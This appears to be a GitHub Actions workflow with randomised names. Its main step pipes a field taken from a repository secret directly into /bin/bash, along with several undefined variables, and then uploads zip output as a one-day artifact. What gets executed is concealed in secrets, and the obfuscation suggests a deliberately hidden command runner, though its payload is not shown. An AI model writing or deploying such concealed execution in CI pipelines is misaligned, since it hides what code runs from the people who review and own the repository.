name: hyperdianaa
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hyperdianaa
        env:
          r6: ${{ secrets.r6 }}
        run: |
          printf '%s' "$r6" | jq -r .a918 | /bin/bash
          echo $xxnpo2350 | jq -r .ej54 | /bin/bash
          printf '%s' "$u052" | jq -r .zwz23 | /bin/bash
          printf '%s' "$wvfh764" | jq -r .cz8 | /bin/bash
          printf '%s' "$fsth25" | jq -r .d8 | /bin/bash
          echo $sb93 | jq -r .x83 | /bin/bash
          printf '%s' "$phhet72577" | jq -r .z53396 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: yK1KfzX4
          path: "*.zip"
          retention-days: 1
